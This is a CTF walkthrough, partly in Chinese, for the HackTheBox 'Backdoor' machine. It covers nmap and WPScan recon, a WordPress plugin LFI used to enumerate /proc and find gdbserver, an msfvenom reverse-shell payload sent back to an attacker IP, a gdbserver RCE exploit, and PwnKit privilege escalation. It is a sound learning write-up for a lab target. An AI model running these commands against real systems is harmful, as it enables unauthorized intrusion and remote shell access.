Overall

Used Skill

/wp-content/plugins directory explosure
LFI
burpsuite
/proc

Rating

⭐⭐☆☆☆☆☆☆☆☆

Recon

nmap

~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.125
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-18 16:53 CST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 20.98% done; ETC: 16:53 (0:00:08 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.94% done; ETC: 16:53 (0:00:10 remaining)
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 55.23% done; ETC: 16:53 (0:00:06 remaining)
Nmap scan report for 10.10.11.125
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor &#8211; Real-Life
|_http-generator: WordPress 5.8.1
1337/tcp open  waste?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/18%OT=22%CT=1%CU=41794%PV=Y%DS=2%DC=T%G=Y%TM=623448A
OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT       ADDRESS
1   398.78 ms 10.10.14.1
2   399.09 ms 10.10.11.125

Get Shell

80 port 是 wordpress， wpscan 開掃，沒掃到什麼有用的
1337 不知道是什麼服務
wpscan --url http://10.10.11.125/ --enumerate u 掃描找到 user admin
wpscan --url http://10.10.11.125/ --users admin --passwords rockyou.txt 爆破未成功
可以直接看 /wp-content/plugins 底下有哪些插件，搜尋 ebook-download 後有看到 LFI 漏洞，http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/tmp/qwer
接下來要想辦法知道 1337 上開啟什麼服務，查了一下資料，可以透過 /proc/net/tcp 查看哪個 ip:port 和 inode 對應，再去爆破 /proc/$pid/fd/$n，用 file 之類的指令找到 fd 對應的 socket ，但是在 LFI 的情境下無法這樣獲得對應關係。另外可以查看 /etc/services 看管理者是不是有把 service - port 對應關係寫在裡面。這兩個方法在這題都不通
最後是 burpsuite 遍歷 /proc/$pid/cmdline 查看所有正在執行的命令

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

找到 1337 跑 gdbserver
Image Not Showing Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
Learn More →
搜尋 gdbserver exploit，找到 gdbserver 9.2 rce
產生 payload msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.60 LPORT=4444 PrependFork=true -o rev.bin
listen nc -nvlp 4444
exploit!

tmp$ python3 50539.py 10.10.11.125:1337 rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener

Privilege Escalation

linpeas.sh
PwnKit

另外 https://medium.com/@bocahganteng/write-up-backdoor-htb-c0092079ef2c 有寫到 root 似乎有開 screen，並且 user 剛好有權限掛 root 的 screen session

Overall

Used Skill

Rating

Recon

nmap

Get Shell

Privilege Escalation

Read more

XSS 筆記

HTML

php

SQLI 筆記